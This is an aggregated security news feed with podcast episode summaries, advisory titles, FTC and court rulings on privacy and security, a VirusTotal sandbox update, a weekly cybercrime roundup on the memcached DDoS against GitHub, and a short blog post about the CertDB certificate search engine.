Once Upon A Time In Shaolin – Enterprise Security Weekly #82
This week, Paul and John are accompanied by Eyal Neemany, Senior Cyber Security Researcher at Javelin Networks! In the news, we have updates from Duo Security, SolarWinds, AlgoSec, Martin Shkreli, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode82
Visit https://www.securityweekly.com/esw for all the latest episodes!
AV18-039: Google Releases Security Update for Chrome
AV18-038: Exim Security Advisory
Cyber Fatigue and What We Can Do About It
Dr. Richard Ford, chief scientist, is revitalizing the CISO’s mission of stopping risk and threats. New vulnerabilities keep cropping up, trapping us in a “tyranny of the urgent” mindset that causes us to focus on the day-to-day rather than the big picture.
The fight is wearing security professionals down. These challenges can range from having a threat-centric view of the world, which means that security is never done, to a limited view of the CISO’s mission.
Join us to learn how the CISO’s role needs to broaden, moving from a narrow threat-centric approach to being truly at the boardroom table driving the business. We need to start focusing on mitigating risk and losses rather than a “yes/no” perspective. Moving toward security approaches that understand user intent is an important step in making the world a better, more secure place.
Session location
Session Address
Date
Extending Behavioral Insights into Risk Adaptive Protection & Enforcement
Carefree attitudes towards data protection in the workplace have caused traditional network perimeters to dissolve and data visibility to diminish. An increasingly mobile workforce, combination of work and personal information on devices, and growing use of cloud services are all key contributors to this change.
The traditional threat-centric approach is to apply rigid policies to decide what is good or bad without context. This black-and-white approach results in frustrated users and overwhelmed admins. The reality is, everybody operates in the grey.
Guy Filippelli, vice president of User and Data Security, will discuss how a human-centric cybersecurity approach adapts to user behavior and helps security teams make better decisions.
We will explore how an effective data security system should cut through the noise of alerts and provide early warning signals to prevent important data loss. Cybersecurity that integrates capabilities like DLP and UEBA for risk-adaptive protection is tailored to the identity and intent of the individual user and continuously adjusts as behavior changes.
Session location
Session Address
Date
Insecure by design: What you need to know about defending critical infrastructure
Patching security vulnerabilities in industrial control systems (ICS) is useless in most cases and actively harmful in others, ICS security expert and former NSA analyst Robert M. Lee of Dragos told the US Senate in written testimony last Thursday. The "patch, patch, patch" mantra has become a blind tenet of faith in the IT security realm, but has little application to industrial control systems, where legacy equipment is often insecure by design.
(Insider Story)FTC Recommends Steps to Improve Mobile Device Security Update Practices
On February 28, 2018, the Federal Trade Commission issued a report, titled Mobile Security Updates: Understanding the Issues (the “Report”), that analyzes the process by which mobile devices sold in the U.S. receive security updates and provides recommendations for improvement. The Report is based on information the FTC obtained from eight mobile device manufacturers, and from information the Federal Communications Commission collected from six wireless carriers.
The Report raises a number of issues concerning the frequency and length of time that mobile devices are patched for security vulnerabilities, including:
- The complexity of the mobile ecosystem leads to a lag time between discovery of vulnerabilities and the issuance of patches.
- Formal support periods and update schedules are rare, and vary widely in application.
- Many device manufacturers fail to maintain regular records about update support decisions, patch development time, carrier testing time, deployment time or uptake rate.
- Manufacturers provide little information to the public about support period, update frequency or end of update support.
While the Commission commends device manufacturers, carriers and operating system developers that have contributed to providing effective security updates, it also makes several recommendations to improve the security update process:
- Consumer Education: Government, industry and advocacy groups should work together to educate consumers about the significance of security update support and consumers’ role in the operating system update process.
- Length of Security Updates: Device manufacturers, operating system developers and wireless carriers should ensure that all mobile devices receive operating system security updates for a period of time that is consistent with consumers’ reasonable expectations.
- Keep and Share Support Data: Companies involved in the security update process should consider keeping and consulting records about support length, update frequency, customized patch development time, testing time and uptake rate; they also should consider sharing this information with partners to fashion appropriate policies and practices.
- Security-only Updates: Industry should continue to streamline the security update process, including by patching vulnerabilities through security-only updates, when the benefits of more immediate action outweigh the convenience of a bundled security-functionality update.
- Minimum Guaranteed Support Periods: Device manufacturers should consider adopting and disclosing minimum guaranteed security support periods (and update frequency) for their devices; they also should consider giving device owners prompt notice when security support is about to end (and when it has ended), so that consumers can make informed decisions about device replacement or post-support use.
Please Vote for Hunton: Nominated for 2018 Cyber Law Firm of the Year
Hunton & Williams LLP is honored to be nominated for Advisen’s 2018 Cyber Risk Awards in the category of Cyber Law Firm of the Year. Advisen is an industry leader in insurance consulting, and regularly hosts conferences offering insights and innovation on cyber risk. The winners are determined by online ballot and the awards will be presented in New York City on June 6, 2018.
Please show your support by voting for Hunton & Williams as 2018 Cyber Law Firm of the Year. Voting ends Friday, April 20, and is limited to one per person, so please vote now!
Additional Crispiness on the MacOS box of apples sandbox
Several improvements visible to users are:
- Sandbox updated to OSX 10.11 El Capitan in sandbox. We have a High sierra update planned for later this year.
- Detailed HTML analysis report is now available.
- Screenshots of the software under analysis to provide more contextual information:
- Show screenshots of what a user would see
- Help determine if the sample is waiting for user input
- Network traffic reports updated
- Country Detection
- Timestamps on file operations, to help show the sequence of events.
- Process tree is shown if there is more than one level of processes
To view the detailed behavior report, click on the behavior tab, then select the Box of Apples sandbox, then click on the detailed report link
Click on the detailed behavior report. |
Some Samples that might be interesting, that contain the new features:
ec7241a6009f1fff38b481d8b4fd6efede4cc2f9d8ee20d9ca2b4ff66d656171
3b196c1c1a64aca81dec5a5143b3f2faaadcc4034b343f46f23348f34a2ef205
694c23b548249056bf90b2b2c252a8c9abfae4aeb611476cbdaa8dc112f79d8f
![]() |
Screenshots and File operations |
![]() |
DNS, IP Traffic and Behavior tags |
This is part of the Multi-Sandbox project. We’ll continue to improve our own and 3rd party sandbox providers that wish to integrate sandboxes into VirusTotal.
If you find any issues, or have feature requests, please don’t hesitate to reach out to us by emailing contact@virustotal.com
Everything that is happening now has happened before
Room To Walk – Business Security Weekly #76
This week, Michael & Paul interview Shawn Tuma, Cybersec and Data Privacy Attorney at Scheef & Stone, LLP! In the Article Discussion, Michael and Paul talk how to build trust with colleagues, simple concepts to free up innovation, and how to avoid death by committee! In the news, we have updates from PhishMe, Splunk, CyberX, and more on this episode of Business Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode76
Visit https://www.securityweekly.com/bsw for all the latest episodes!
AV18-037: Pivotal Spring Security Update
Weekly Cyber Risk Roundup: Record-Setting DDoS Attacks, Data Breach Costs
Last week, researchers observed a 1.35 Tbps distributed denial-of-service attack (DDOS) attack targeting GitHub. It was the largest DDoS attack ever recorded, surpassing the 1.2 Tbps attack against DNS provider Dyn in October 2016.
The attack leveraged a newly observed reflection and amplification vector known as memcached. Akamai researchers warned that other organizations experienced similar DDoS attacks using the new method following the GitHub attack and that even larger attacks may be possible in the future.
“Memcached can have both UDP and TCP listeners and requires no authentication,” the researchers wrote. “Since UDP is easily spoofable, it makes this service vulnerable to use as a reflector. Worse, memcached can have an amplification factor of over 50,000, meaning a 203 byte request results in a 100 megabyte response.”
The attack was mitigated within 10 minutes, GitHub said. The following day GitHub was the target of a second DDoS attack that disrupted availability for a 15-minute period, ThousandEyes reported.
“Because of its ability to create such massive attacks, it is likely that attackers will adopt memcached reflection as a favorite tool rapidly,” Akamai researchers wrote. “The good news is that providers can rate limit traffic from source port 11211 and prevent traffic from entering and exiting their networks, but this will take time.”
Wired reported there are approximately 100,000 memcached servers that currently have no authentication protection and can be abused by malicious attackers to carry out similar potentially massive, botnet-free DDoS attacks.
Other trending cybercrime events from the week include:
- W-2 information breached: The University of Alaska said that 50 current and former employees and students had their personal information compromised when hackers gained access to their university accounts by answering security questions and resetting their passwords. The Association for Supervision and Curriculum Development is notifying employees that their W-2 information was compromised due to a spear phishing attack. Wallace Community College Selma said that current and former employees had their W-2 information compromised when an employee fell for a phishing scam. Curtis Lumber is notifying employees that their personal information was stolen in a spear phishing attack, and some of those employees have reported issues related to filing their federal taxes following the incident.
- Ransomware infections continue: The Colorado Department of Transportation said that computers had been reinfected with ransomware eight days after an initial attack. Both the Children’s Aid Society of Oxford County and the Family and Children’s Services of Lanark, Leeds and Grenville in Canada were the victims of a ransomware infection. Jemison Internal Medicine is notifying 6,550 patients of a ransomware infection that may have compromised their personal information.
- Payment card breaches and service disruptions: A number of Tim Hortons locations in Canada were temporarily shut down or were forced to close their drive-throughs after malware was discovered targeting Panasonic cash registers. NIS America said that customers of its online stores had their information compromised due to being redirected to a malicious site that would harvest their information during the checkout process. North 40 is notifying customers that their payment card information may have been compromised due to unauthorized access to its e-commerce website.
- Notable data breaches: A hacker gained access to the intranet of Germany’s government and accessed confidential information. St. Peter’s Surgery and Endoscopy Center is notifying patients that their personal and medical information may have been compromised due to unauthorized access to its servers. Healthcare vendor FastHealth submitted a data breach notification regarding unauthorized access to its web server. Porsche Japan said that the information of customers was exposed due to a hack. Metro Wire Rope Corporation said that an employee email account was compromised after the employee opened a malicious attachment with credential-stealing capabilities. The French news magazine L’Express exposed a database containing the personal information of readers and after being notified of the exposure took a month to secure the data. U.S. Marine Corps Forces Reserve may have compromised the personal information of 21,426 individuals due to sending an unencrypted email with an attachment to the wrong email distribution list.
- Other notable events: The Financial Services Information Sharing and Analysis Center said that one of its employees was successfully phished, and the compromised email account was used to send further phishing messages to other members, affiliates, and employees. The recent hack of the PyeongChang Winter Olympics that led to Internet disruptions and website downtime was a false-flag operation carried out by Russian military spies to make it appear as if the attack was carried out by North Korea, U.S. intelligence officials said. An Arkansas man who developed the remote-access Trojan NanoCore and marketed it on Hack Forums has been sentenced to 33 months in prison.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Equifax was back in the news this week after announcing it had discovered an additional 2.4 million U.S. consumers who were affected by its massive 2017 data breach, bringing the total number of people impacted to 147.9 million.
“This is not about newly discovered stolen data,” said Paulino do Rego Barros, Jr., Interim chief executive officer in a press release. “It’s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.”
The company also said that it expects breach-related costs to hit $275 million in 2018, which Reuters noted could make the Equifax breach the most costly hack in corporate history:
The projection, which was disclosed on a Friday morning earnings conference call, is on top of $164 million in pretax costs posted in the second half of 2017. That brings expected breach-related costs through the end of this year to $439 million, some $125 million of which Equifax said will be covered by insurance.
Those breach-related costs could rise further once legal actions from consumers and regulators are finally resolved. However, Sen. Elizabeth Warren recently stated that “Equifax is still making money off their own breach” and that even consumers who do not want to do business with them may end up buying credit protection services from another company who “very well may be using Equifax to do the back office part.”
It’s the same criticism she waged in January when introducing a bill with Sen. Mark Warner to address problems related to credit agencies collecting data without strict protections in place to secure that information. As CNET noted, if such a bill was in place at the time of the Equifax breach, the company likely would have faced a fine of at least $14.3 billion.
Everything Old Is New Again – Application Security Weekly #07
This week, Keith and Paul discuss Facebook’s mandatory malware scan, GitLeaks: Check git repos for secrets and keys, New York quietly working to prevent a major cyber attack, and more on this episode of Application Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode07
Visit https://www.securityweekly.com/asw for all the latest episodes!
Ninth Circuit Decision Bolsters FTC Authority Over Internet Service Providers
On February 26, 2018, the United States Court of Appeals for the Ninth Circuit ruled in an en banc decision that the “common carrier” exception in the Federal Trade Commission Act is “activity-based,” and therefore applies only to the extent a common carrier is engaging in common carrier services. The decision has implications for FTC authority over Internet service providers, indicating that the FTC has authority to bring consumer protection actions against such providers to the extent they are engaging in non-common carrier activities. The Federal Communications Commission (“FCC”) has previously ruled that Internet access service is not a common carrier service subject to that agency’s jurisdiction.
The Ninth Circuit’s decision arose from a case brought by the FTC against AT&T Mobility, LLC (“AT&T”), regarding AT&T’s “data-throttling practice,” by which “the company reduced customer broadband data speed without regard to actual network congestion” when a customer’s mobile data usage exceeded a specified limit. The FTC brought an action under Section 5 of the FTC Act, alleging that the practice was unfair and deceptive. AT&T moved to dismiss the action, arguing that it was exempt from the FTC’s Section 5 authority on the basis of the “common carrier exception,” in which “common carriers subject to the Acts to regulate commerce” are exempt from Section 5 enforcement authority. The court held that the common carrier exception is activity based, not “status-based,” and applies only to the extent an entity is engaging in common carrier activities. Accordingly, AT&T could not claim Section 5 exemption based on the argument that its overall status was that of a common carrier, and the Ninth Circuit denied its motion to dismiss. The Chairman of the FCC and Acting Chair of the FTC both expressed approval of the court’s decision.
NIS America hacked: Customer payment card data stolen, $5 off next purchase offered as apology gift
It’s All Uphill From Here – Paul’s Security Weekly #549
This week, Mary Beth Borgwing of Mach37, joins us for an interview! In our second feature interview, Paul speaks with Cybersecurity Journalist Bruce Sussman of SecureWorld! In the news, we have updates from Quickjack, GitHub, the 2018 Olympics, and more on this episode of Paul's Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode549
Visit https://www.securityweekly.com/psw for all the latest episodes!
What is Triada? Data-stealing malware infects over 40 Android models’ firmware while manufacturing
FTC Announces Settlement for Venmo’s Alleged Violations of the GLBA’s Privacy and Safeguards Rules
On February 27, 2018, the Federal Trade Commission (“FTC”) announced an agreement with PayPal, Inc., to settle charges that its Venmo peer-to-peer payment service misled consumers regarding privacy and the extent to which consumers’ financial accounts were secured. This is the second significant FTC settlement in the past three months that addressed these issues, following the FTC’s action against TaxSlayer, Inc. and signals a renewed focus by the FTC on violations of the Gramm-Leach-Bliley Act’s (“GLBA’s”) Privacy and Safeguards Rules.
The FTC’s complaint alleged that Venmo violated the Privacy Rule in three separate ways. First, Venmo failed to provide a clear and conspicuous privacy notice that “did not call attention to the nature and significance of the nature of the notice.” Rather, the privacy notice in Venmo’s mobile application (the “Venmo App”) was in grey text on a light grey background that was not conspicuous to Venmo users. Second, Venmo did not provide an accurate notice that describes how Venmo shares the user’s personal information. Venmo’s privacy notice stated that it only shared users’ personal information with members of their Venmo “social web” if they designated their account transactions as “public.” Instead, Venmo shared this information by default with everyone online, including individuals who did not have a Venmo account. Finally, Venmo did not deliver the initial privacy notice in a manner that each customer could reasonably be expected to receive it. The privacy notice was included as a hyperlink in the Venmo App, but users were not required to acknowledge its receipt “as a necessary step to obtaining a financial product or service.”
The FTC complaint also alleged that Venmo misrepresented its information security practices by stating that it “uses bank-grade security systems and data encryption to protect your financial information.” Instead, the FTC alleged that Venmo violated the Safeguards Rule by failing to (1) have a written information security program; (2) assess the risks to the security, confidentiality and integrity of customer information; and (3) implement basic safeguards such as providing security notifications to users that their passwords were changed.
In the settlement, Venmo is prohibited from misrepresenting the level of protection provided by its privacy settings and the extent to which Venmo implements or adheres to a particular level of security. Venmo is also prohibited from violating the Privacy Rule and the Safeguards Rule and is required to obtain biennial third-party assessments of its compliance with these rules for 10 years.
In announcing the settlement, Acting FTC Chairwoman Maureen K. Ohlhausen noted that consumers suffered real harm from Venmo’s misrepresentations and stated that “this case sends a strong message that financial institutions like Venmo need to focus on privacy and security from day one.”
GitHub was hit by a massive 1.35 Tbps DDoS attack – the most powerful ever recorded
Differentiating the Differentiators – Enterprise Security Weekly #81
This week, Paul is joined by Doug White to interview Ferruh Mavituna, Founder and Product Manager of Netsparker! In the news, we have updates from Atos, Trustwave, Radware, and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode81
Visit https://www.securityweekly.com/esw for all the latest episodes!
GandCrab ransomware: How to decrypt and recover your data without paying ransom
AV18-036: Moxa OnCell Security Update
Chafer: Iranian hacking group expands attacks, spying operations on airline firms in Middle East
How to filter and query SSL/TLS certs for intelligence

Recently I noticed a new service/ project that is turning few heads among my peers in security community - CertDB. A one of its kind which indexes the domains SSL certs with their details, IP records, geo-location and timelines, common-name etc. They term themselves as Internet-wide search engine for digital certificates. They have a unique business statement when you get to understand the different components (search vectors) they are incorporating in this project. I know there are few transparent cert registries like Certificate Search but as per their website,
Examining the data hidden in digital certificates provides a lot of insight about business activity in a particular geography or even collaboration between 2 different companies.
I know and agree with them on these insights that they do come handy while performing reconnaissance during a security assessment (OR) validating the SSL/ TLS certificates for your client. It does reflect on the fact that maybe the certificate is about to expire, or new domains have been registered in the same certificate (example, Subject Alternate Name: DNS Name). But when I browsed through their project website, I was surprised the way they articulated their USP (unique selling point),
For example, the registration of a new unknown domain in Palo Alto hints at a new start-up; switching from the "Wildcard" certificate to "Let's Encrypt" tells us about the organization's budget constraints; issuing a certificate in an organization with domains of another organization speaks about collaboration between companies, or even at an acquisition of one company by another.
Now, I am intrigued to do a detailed article on their services, business model, filters and even an interview with their project team.
Question: Are you curious/interested, and what would you like to ask them? Do leave a comment.